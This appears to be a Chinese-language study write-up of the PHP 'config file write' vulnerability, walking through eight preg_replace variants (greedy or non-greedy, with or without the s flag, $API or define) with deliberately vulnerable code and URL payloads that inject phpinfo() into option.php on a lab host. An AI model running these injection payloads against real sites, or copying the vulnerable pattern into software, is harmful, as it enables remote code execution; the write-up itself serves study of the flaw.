寒假在家时看了P牛的经典写配置漏洞与几种变形,一直到开学都没有仔细去分析其中的原理。最近又看到了,还是好好地分析一下吧。
P牛在文章中把这类漏洞分了
0x01 贪婪模式无s
1
2
3
4
5
6
7
|
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/\\\$API = '.*';/", "\$API = '{$api}';", $file);
file_put_contents('./option.php', $file);
|
1
2
3
4
|
<?php
highlight_file(__FILE__);
$API = 'test';
|
1
| http://192.168.59.156/test.php?api=%27;%0aphpinfo();//
|
因为phpinfo();后面有单引号,所以需要注释掉。
1
| http://192.168.59.156/test.php?api=aa
|
0x02 贪婪模式有s
1
2
3
4
5
6
7
|
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/\\\$API = '.*';/s", "\$API = '{$api}';", $file);
file_put_contents('./option.php', $file);
|
1
2
3
4
|
<?php
highlight_file(__FILE__);
$API = 'test';
|
1
| http://192.168.59.156/test.php?api=;phpinfo();
|
1
| http://192.168.59.156/test.php?api=$0
|
$0为正则表达式匹配到的内容,替换后刚刚好闭合前面的引号,逃逸出phpinfo()。
0x03 非贪婪无s
1
2
3
4
5
6
7
|
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/\\\$API = '.*?';/", "\$API = '{$api}';", $file);
file_put_contents('./option.php', $file);
|
1
2
3
4
5
|
<?php
highlight_file(__FILE__);
$API = 'test';
|
1
| http://192.168.59.156/test.php?api=%27;%0aphpinfo();//
|
1
| http://192.168.59.156/test.php?api=aa
|
0x04 非贪婪有s
1
2
3
4
5
6
7
|
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/\\\$API = '.*?';/s", "\$API = '{$api}';", $file);
file_put_contents('./option.php', $file);
|
1
2
3
4
|
<?php
highlight_file(__FILE__);
$API = 'aa';
|
同样可以利用2的方法
1
| http://192.168.59.156/test.php?api=;phpinfo();
|
1
| http://192.168.59.156/test.php?api=$0
|
另外还可以
1
| http://192.168.59.156/test.php?api=aaa%27;phpinfo();//
|
1
| http://192.168.59.156/test.php?api=aaa
|
0x05 define贪婪无s
1
2
3
4
5
6
7
|
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/define\('API', '.*'\);/", "define('API', '{$api}');", $file);
file_put_contents('./option.php', $file);
|
1
2
3
4
|
<?php
highlight_file(__FILE__);
define('API', 'aaa');
|
1
| http://192.168.59.156/test.php?api=%27);%0aphpinfo();//
|
1
| http://192.168.59.156/test.php?api=aa
|
0x06 define贪婪有s
1
2
3
4
5
6
7
|
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/define\('API', '.*'\);/s", "define('API', '{$api}');", $file);
file_put_contents('./option.php', $file);
|
1
2
3
4
|
<?php
highlight_file(__FILE__);
define('API', 'aaa');
|
1
| http://127.0.0.1/t.php?api=1\%27);phpinfo();%23
|
因为preg_replace在替换的时候会吃掉转义符,利用这个特点,即可引入单引号。这种方法可以通杀全文的
0x07 define非贪婪无s
1
2
3
4
5
6
7
|
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/define\('API', '.*?'\);/", "define('API', '{$api}');", $file);
file_put_contents('./option.php', $file);
|
1
2
3
4
|
<?php
highlight_file(__FILE__);
define('API', 'aaa');
|
1
| http://127.0.0.1/t.php?api=1\%27);phpinfo();%23
|
http://192.168.59.156/test.php?api=%27);phpinfo();//
http://192.168.59.156/test.php?api=aa
0x08 define非贪婪有s
1
2
3
4
5
6
7
|
<?php
highlight_file(__FILE__);
$api = addslashes($_GET['api']);
$file = file_get_contents('./option.php');
$file = preg_replace("/define\('API', '.*?'\);/s", "define('API', '{$api}');", $file);
file_put_contents('./option.php', $file);
|
1
2
3
4
|
<?php
highlight_file(__FILE__);
define('API', 'aaa');
|
1
| http://192.168.59.156/test.php?api=%27);phpinfo();//
|
1
| http://192.168.59.156/test.php?api=aa
|
参考链接:
经典写配置漏洞与几种变形